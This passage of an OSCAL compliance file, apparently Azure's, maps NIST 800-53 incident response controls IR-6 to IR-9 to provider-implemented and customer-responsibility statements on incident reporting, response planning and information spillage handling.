statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"62a7e560-c7af-41f4-bba0-0ef3c5b86a83","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-6_smt.b","by-components":[{"uuid":"ce710e1e-580e-499a-8862-629e065078cc","export":{"provided":[{"uuid":"6641e48a-b395-4864-88c1-06384b152b0e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-024"}],"description":"The Azure Security team coordinates with the ISSO to notify the appropriate contacts including, as appropriate, authorizing officials, customers, and others, of an incident, incident updates, and resolution. Azure reports events per the timelines and process are documented in the Azure Incident Management Standard Operating Procedure (SOP) . The Azure Incident Management Standard Operating Procedure (SOP) identifies the types of security incidents that should be reported to the regulator or regulators, reporting timeframes, and specific processes for reporting and handling incidents involving customer data. Customers receive notification of security incidents involving the confirmed breach of their customer data via means Microsoft deems most appropriate. This is via email sent to the administrators and co-administrators of an impacted subscription or through updates to the Service Health Dashboard, or the customer's Azure Management Portal within the times periods defined in the Azure Incident Management Standard Operating Procedure (SOP)."}],"responsibilities":[{"uuid":"06de8a91-e6cd-47f0-afe2-f911180ec453","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-024"}],"description":"The customer is responsible for reporting security incident information. Per contractual agreement, it is the customer's responsibility to provide accurate and current contact information to Microsoft Azure in order to receive notifications of security incidents involving the potential breach of customer data. The customer is also responsible to designate US-CERT as a notification contact. It is the responsibility of the government customer agencies to inform Microsoft of the individuals, teams, and email addresses to be notified and kept updated for the incident handling process. Upon a confirmed security incident, Azure Security Response will notify the Administrators and Co-Administrators of a subscription. It is the responsibility of the government customer agencies to notify US-CERT if a breach occurs entirely within the customer's scope of responsibility (e.g. if a customer VM is breached due to a poor password).","provided-uuid":"6641e48a-b395-4864-88c1-06384b152b0e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ef7425a7-99c9-43d4-aade-96eb19ea628e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-6.1","statements":[{"uuid":"ff13f071-5a15-43f0-9b42-34e4d37cb59d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-6.1_smt","by-components":[{"uuid":"72470177-6c66-449e-bf94-67252fdee74c","export":{"provided":[{"uuid":"4a241db6-1fbd-4b80-9d5f-a54bec7e152a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-025"}],"description":"Azure automates incident reporting through use of Incident Management (IcM) connectors which trigger the creation of an incident via detection logic._x000D_ _x000D_ Azure Security Monitoring (ASM) and SCUBA are the primary automated monitoring systems for security event reporting used within Azure. Any alerts or detections fired by ASM or SCUBA notify either the service team which owns the asset or the Security Response Team, depending on what is most appropriate, via IcM._x000D_ _x000D_"}],"responsibilities":[{"uuid":"0b3f9ded-1084-426e-9da5-621c9c3aa825","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-025"}],"description":"The customer is responsible for employing automated mechanisms to support incident reporting (e.g., ticketing and incident tracking/reporting systems).","provided-uuid":"4a241db6-1fbd-4b80-9d5f-a54bec7e152a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1d5449d1-c107-4874-af50-4611d88dde08","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-6.3","statements":[{"uuid":"1f2ea6fe-6787-44a3-83b0-1c06729a8109","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-6.3_smt","by-components":[{"uuid":"3f0b259a-6e6f-4eaf-b50d-5a20d9d1eb53","export":{"provided":[{"uuid":"fbd1fe58-9d44-40fd-9f00-f2fc3dbf9a5e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-026"}],"description":"As part of Microsoft Supply Chain Security Program, Azure deploys a team responsible for leading and supporting supply chain risk management activities. The team members are introduced to industry-leading supply chain quality programs to support Azure cloud environments. The team members have established agreements and procedures with various Azure partner teams of supply chain such as Azure Security, Azure Federal Compliance, and CELA teams for the notification of supply chain compromises and findings that are a result of assessments. If findings are identified, stakeholders of Azure cloud environments are notified through the approval of CELA on communication plans. Remediation plans for supply chain compromises or findings during assessments are formulated to track until implementation by team members who lead and support supply chain risk management activities."}],"responsibilities":[{"uuid":"c3303081-26e2-455f-92d7-5c5813f513e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-026"}],"description":"The customer is responsible for providing incident information to providers of products or services and other supply chain organizations for incidents related to customer-deployed resources.","provided-uuid":"fbd1fe58-9d44-40fd-9f00-f2fc3dbf9a5e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"26e910f7-777f-4ece-8fd5-21594b711ab6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-7","statements":[{"uuid":"c5af4851-b40b-4e01-9fb9-2c8649621a60","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-027"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-7_smt","by-components":[{"uuid":"0908e6ab-8caf-4be3-be05-7b73ff5b4e0f","export":{"provided":[{"uuid":"2315bb4f-5e84-4fdc-878a-f8c6ee1a1d1f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-027"}],"description":"For all asset types, Azure implements both internal and external sites which offer advice and assistance to Azure personnel and customers for handling and reporting of security incidents. Azure sites are supported on SharePoint and internal access is granted to appropriate personnel. Internal Azure policies and procedures are distributed and published to a central SharePoint repository and are accessible to all Azure personnel. The Azure Security Response Team provides regular updates around event triage and incident management which are available to all applicable Azure incident management personnel. Azure use the services of the Cyber Defense Operations Center (CDOC) to manage incident questions and reporting by Microsoft personnel. Microsoft personnel can report incidents using the email alias \"cdoc@microsoft.com\" or via Incident Management (IcM) which is then routed to the appropriate Azure team. Internal web pages offer advice and assistance to service teams for the handling and reporting of security incidents. These web pages provide the following information to Azure personnel: * What are security incidents * How to identify such incidents * How to escalate the security incidents * List of sample security incidents * Who to contact in the event of a security incident The Azure Security Response Team also posts a phone number and email alias on their internal website. This contact information is provided for service team personnel to use when required to file a security incident. Additionally, security contact information is available as part of IcM. Depending on the nature of the incident, Azure may engage subject matter experts (SMEs) from other organizations within Microsoft to facilitate investigative needs. External The Azure Trust Center describes how to submit a security incident in Azure. The Microsoft Developer Network (MSDN) webpage also provides support to customers and links them to a wide variety of web pages which provide guidance around information security incidents related to their cloud environment and customer support, if needed. Customers can report security events at any time through the customer support website handled by Customer Support Services (CSS). CSS routes it to appropriate service team. In addition, possible security incidents and abuse can be reported on <https://cert.microsoft.com/>. These reports are received by the Online Services Security and Compliance Security team and then routed to the appropriate service team to investigate and correct the event. There is also a dedicated phone line that is available on a twenty-four (24) hours a day, seven (7) days a week basis to report events at 1-866-676-6546. Working with the C+AI Security Response Team, external parties such as law enforcement, Information Security Programs (ISPs), and other partners can identify security issues. For example, the Global Infrastructure Alliance for Internet Security (GIAIS) utilizes the Microsoft Security Response Alliance to feed security concerns to Microsoft's online services which is then routed to the appropriate Azure service teams."}],"responsibilities":[{"uuid":"391c0196-0e7e-49ee-911f-d93409d2d901","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-027"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for providing incident response support resources that are integral to the organizational incident response capability, providing advice and assistance to users handling incidents.","provided-uuid":"2315bb4f-5e84-4fdc-878a-f8c6ee1a1d1f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e703df5f-ef70-4bdb-86d2-39d009b0b2f1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-7.1","statements":[{"uuid":"363950dc-5852-4585-8b52-ff423d239dff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-028"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-7.1_smt","by-components":[{"uuid":"11b242b4-9ca0-4dca-bd7c-29f859e3fba4","export":{"provided":[{"uuid":"ccbee6fd-972c-4764-b774-f0cc8a8fad64","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-028"}],"description":"Azure tracks events and incidents through Incident Management system (IcM) and Service Now (SNow) and employs Azure Security Monitoring (ASM) and SCUBA within the environment in support of the incident management process. These systems utilize automated mechanisms to identify incidents as well as document, track, and report incidents._x000D_ _x000D_ For high severity incidents, Azure Security maintains an internal notification wiki site on the central Microsoft Teams repository. Azure teams and individuals can sign up to receive automated email alerts when SharePoint content is added or modified. Internal web pages and SOPs offer advice and assistance to service team personnel for the handling and reporting of security incidents, including the Azure Incident Management SOP and the service-team-specific incident management SOPs._x000D_ _x000D_"}],"responsibilities":[{"uuid":"1b05180f-563c-4363-8f64-97aec1a86f07","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-028"}],"description":"The customer is responsible for using automated mechanisms to increase the availability of incident response support resources. LINK Excel.Sheet.12 https://firstinfotech.sharepoint.com/sites/infosec/microsoft/Shared%20Documents/CaaS/Blueprint/Azure%20Federal%20Attachment%209%20Work/Azure%20Federal%20-%20Customer%20Responsibility%20Statements.xlsx \"Customer Responsibility Matrix!R341C4\" \\a \\f 4 \\h \\* MERGEFORMAT","provided-uuid":"ccbee6fd-972c-4764-b774-f0cc8a8fad64"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"3139456b-7920-400f-a6fd-97826e0ce125","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-8","statements":[{"uuid":"3b70e730-26ca-4d9f-be3f-02c4ba69decf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-8_smt.a","by-components":[{"uuid":"76d6c5be-55ba-4e42-8101-8d5f100f5cb9","export":{"provided":[{"uuid":"affa5874-6fb4-4702-846c-9fdca2fd017d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-029"}],"description":"Azure has developed and implemented the Incident Management SOP. The Incident Management SOP provides Azure a roadmap for implementing its incident management capability. The purpose of the SOP is to provide guidance concerning the responsibilities of involved parties during any incident that affects the confidentiality, integrity, or availability of Azure. The SOP provides a high-level approach for how the incident management capability fits into the overall organization and describes the structure and organization of the incident management capabilities, including:_x000D_ _x000D_ * Describing the end-to-end process of security incident management, and how it is executed across the various functional groups within Microsoft._x000D_ * Defining a methodical approach that may be applied to resolve security incidents and escalate incidents to the proper internal authorities._x000D_ _x000D_ The Incident Management SOP explains the different phases of the incident management lifecycle. Details for each of the phases are explained in the plan. The SOP also identifies the internal partners, cross-team contacts, roles and responsibilities, and lists the individuals and management support needed to effectively maintain and mature the incident management capability._x000D_ _x000D_ The SOP provides guidance for classifying the incidents and assigning severity. It also provides the characteristics that could be associated with incidents to help categorize the incidents. Security incidents are tracked in a ticketing system where they are categorized and assigned a severity rating. Security incidents include, but are not limited to: e-mail viruses, rootkits, worms, denial of service attacks, unauthorized access, inappropriate use of network resources, any other type of unauthorized, unacceptable, unlawful activity involving Azure computer networks or data processing equipment, and compromise, disclosure, or use of information that occurs outside its intended purpose._x000D_ _x000D_ There are five phases in the Azure incident management lifecycle: detect, assess, diagnose, stabilize and recover, and close. The SOP meets the unique requirements of the organization, which relate to mission, size, structure, and functions._x000D_ _x000D_ The Microsoft Security Response Center (MSRC) is responsible for reporting on its efforts with Azure as a Quality of Service (QoS) Metric. Metrics are defined as the following:_x000D_ _x000D_ * Total Number of Incidents: The Security Response Team reports the total number of incidents experienced by online services and can report incidents with respect to incident category, property affected, and other dimensions._x000D_ * Time to Detect (TTD): The time between when an incident began and when it was identified by the finder. This metric can only be determined after an investigation has been conducted by the Security Response Team._x000D_ * Time to Engage (TTE): The time between when an incident is reported to Security Response Team and Security Response Team takes action._x000D_ * Time to Mitigate (TTM): The time between when an incident is reported to Security Response Team and the incident is mitigated and/or resolved._x000D_ _x000D_ A formal Incident Report is produced by the service teams and augmented with the Azure Security Response Team's additions. These reports, which include lessons learned, are created for all events with a Severity 1 rating. For incidents of lesser severity, if there are significant lessons learned that have general applicability across the Azure environment, an incident report is created. The incident reports are maintained by Azure Security incident management or by the impacted service team and are provided to the relevant stakeholders for review._x000D_ _x000D_"}],"responsibilities":[{"uuid":"7d02a835-4fc8-43d9-9ea9-d31d0f3d8251","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-029"}],"description":"The customer is responsible for developing an incident response plan for customer-deployed resources. The incident response plan should include: a roadmap for implementing its incident response capability; the structure and organization of the incident response capability; a high-level approach for how incident response fits into the customer's organization; how the plan meets unique customer requirements which relate to mission, size, structure and functions; a definition of reportable incidents; metrics for measuring incident response capability; resources and management support needed to effectively maintain and mature the incident response capability; and the personnel/roles responsible for reviewing and approving the plan.","provided-uuid":"affa5874-6fb4-4702-846c-9fdca2fd017d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8ceadf49-9de3-4d6d-b8ec-f90eef64dbf6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-8_smt.b","by-components":[{"uuid":"f5512603-f2a6-4eda-ba7d-91b348f3a832","export":{"provided":[{"uuid":"4e9af8b1-6d89-4803-b7f3-9f124e7aae32","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-030"}],"description":"The SOP is stored in a centralized SharePoint site. Azure uses SharePoint access controls to protect the document from unauthorized disclosure or modification._x000D_ _x000D_"}],"responsibilities":[{"uuid":"e9e5b81d-6779-4073-963b-7b8de2b2d64d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-030"}],"description":"The customer is responsible for distributing the incident response plan.","provided-uuid":"4e9af8b1-6d89-4803-b7f3-9f124e7aae32"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e082b3ca-0428-4703-b3b6-834ad058cc7c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-031"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-8_smt.c","by-components":[{"uuid":"253d1ed0-dc16-4892-8fe0-1e9ff291a271","export":{"provided":[{"uuid":"cd18dec2-b24a-4508-af52-b7493d1302e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-031"}],"description":"At a minimum, the SOP is reviewed and updated annually. Additionally, if applicable, post-incident response action items for incidents may trigger changes to be applied to the SOP and accompanying playbooks as required._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c0405af8-15cb-4bdc-9503-af3477fc17f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-031"}],"description":"The customer is responsible for reviewing the incident response plan.","provided-uuid":"cd18dec2-b24a-4508-af52-b7493d1302e0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"44fc9f74-184a-4020-809a-08c011f62e50","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-032"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-8_smt.d","by-components":[{"uuid":"c8346782-c5a1-4e32-9d1a-612f153d9083","export":{"provided":[{"uuid":"fe5608b6-78b9-451e-aaad-897fd89532bd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-032"}],"description":"Post-incident response action items for incidents may trigger changes to be applied to the SOP and accompanying playbooks as required._x000D_ _x000D_"}],"responsibilities":[{"uuid":"85f62d35-eca2-4dbb-b7e8-a8c26b2248d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-032"}],"description":"The customer is responsible for updating the incident response plan.","provided-uuid":"fe5608b6-78b9-451e-aaad-897fd89532bd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ce9b3e67-831c-422f-9904-a0670432a754","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-8_smt.e","by-components":[{"uuid":"2418b6e3-07b1-41c0-9cea-5ffd559e8348","export":{"provided":[{"uuid":"6a9423b2-65ad-4fe0-b966-34aa512cb1ea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-033"}],"description":"After changes have been made to the SOP, it is made available for review to Azure personnel via a centralized SharePoint site._x000D_ _x000D_"}],"responsibilities":[{"uuid":"8594fab8-26f0-435f-ae8f-c549f61614d1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-033"}],"description":"The customer is responsible for communicating changes made to the incident response plan.","provided-uuid":"6a9423b2-65ad-4fe0-b966-34aa512cb1ea"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a425abc3-c27b-4d54-a18b-f1083881c2b8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-9","statements":[{"uuid":"a965ad94-6f5a-4c83-9c82-0c029815fbe5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9_smt.a","by-components":[{"uuid":"8bf9da2e-6aed-4c3e-90b0-9b871392c546","export":{"provided":[{"uuid":"dcb955c7-f7bc-4567-9e08-27f5b75afa86","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-034"}],"description":"The Azure Security Response Team consisting of Microsoft Cloud + AI Livesite, Privacy, and Security Teams, is responsible for responding to information spills. The team coordinates with service teams and partner groups in their response to an information spillage scenario."}],"responsibilities":[{"uuid":"26c810c8-e3df-4d21-a08d-db683f3afb3c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-034"}],"description":"The customer is responsible for assigning individuals for responding to information spills.","provided-uuid":"dcb955c7-f7bc-4567-9e08-27f5b75afa86"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4126c777-7e16-4c8b-b4a5-c87af1492945","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9_smt.b","by-components":[{"uuid":"2232f60f-580c-4fa6-b31f-54aeb24ee870","export":{"provided":[{"uuid":"2037a9ef-2ca1-4fb6-92e8-f81c73b468bd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-035"}],"description":"In the event of an information spill, Azure initiates the incident management process to identify the specific information involved in the spill, as well as the assets or networks affected. Procedures exist to ensure that Azure personnel impacted by information spills can continue to carry out assigned tasks while contaminated services are undergoing corrective actions."}],"responsibilities":[{"uuid":"4344877e-946f-447a-a075-ed90dd4c1c9c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-035"}],"description":"The customer is responsible for identifying customer-controlled information involved in the information contamination.","provided-uuid":"2037a9ef-2ca1-4fb6-92e8-f81c73b468bd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1521b739-a930-49fd-811e-81384dc0075d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9_smt.c","by-components":[{"uuid":"06a69da8-54e1-4505-b2e8-74688606ad41","export":{"provided":[{"uuid":"8ef8fd84-458a-4ec4-a3c6-8703b010d73a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-036"}],"description":"The Azure incident management process includes notification of appropriate personnel as documented in the Azure Incident Management Standard Operating Procedure (SOP)."}],"responsibilities":[{"uuid":"f2f7a8ba-732c-41d2-b1f3-36b312a95cf3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-036"}],"description":"The customer is responsible for responding to information spills of customer-controlled data, including the personnel/roles to be alerted of the information spill and the usage of a communication method that is not associated with the spill.","provided-uuid":"8ef8fd84-458a-4ec4-a3c6-8703b010d73a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ae39e93d-2d07-4ba1-8b6e-a204184fcdbe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-037"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9_smt.d","by-components":[{"uuid":"17f88cdc-d7b2-43e8-b3f1-1362323532ee","export":{"provided":[{"uuid":"87b10627-f8c0-4019-9f5a-e66609a2df17","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-037"}],"description":"In the instance of a contaminated asset or network, the Security Response Team isolates the spillage using rapid containment options available to properly address the reach of an information spillage. Some of the rapid containment options include powering off the asset, institute Border Gateway Protocol (BGP) black hole routing, and network configuration changes to contain the breach."}],"responsibilities":[{"uuid":"df0a03eb-02c5-48b6-afbf-ca1ed671e908","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-037"}],"description":"The customer is responsible for responding to information spills, including how the contaminated customer-deployed resources are isolated.","provided-uuid":"87b10627-f8c0-4019-9f5a-e66609a2df17"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"cf1814c3-8bf5-433a-8f9a-daa4a11cea6e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-038"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9_smt.e","by-components":[{"uuid":"0c2c1d14-bc24-4479-ac20-77a9a018af51","export":{"provided":[{"uuid":"3b873653-1d4a-4da6-87d4-8cb6e1348728","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-038"}],"description":"Upon identification of Azure assets containing spilled information, Azure incident management personnel take steps to eradicate that information. After the information spillage is contained, a cleanup process is initiated. The cleanup process involves locating, isolating, and deleting the contaminated data. In addition, data zeroing would be completed, in order to ensure mirrored data to replica sites are also cleansed."}],"responsibilities":[{"uuid":"2d0d09f2-1019-41c8-946b-952ae688cf2d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-038"}],"description":"The customer is responsible for responding to information spills, including the eradication of information from the contaminated customer-deployed resources.","provided-uuid":"3b873653-1d4a-4da6-87d4-8cb6e1348728"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"925fc660-fb16-4963-a729-69ca6ae63d65","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-039"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9_smt.f","by-components":[{"uuid":"6d3fc7e5-381c-46bb-9e07-15c7792fd228","export":{"provided":[{"uuid":"2a6bcb06-b3bb-422c-86e1-745e5b8c9840","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-039"}],"description":"The process of identifying contaminated assets followed by Azure includes identification of other assets to which data may have been replicated, and if necessary, further investigation of those assets."}],"responsibilities":[{"uuid":"c5a61715-513d-4243-b1a3-8b9ee9ed3917","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-039"}],"description":"The customer is responsible for responding to information spills of customer-controlled data, including the identification of other resources which may have been subsequently contaminated.","provided-uuid":"2a6bcb06-b3bb-422c-86e1-745e5b8c9840"}]},"description":"See inheritance and customer responsibility 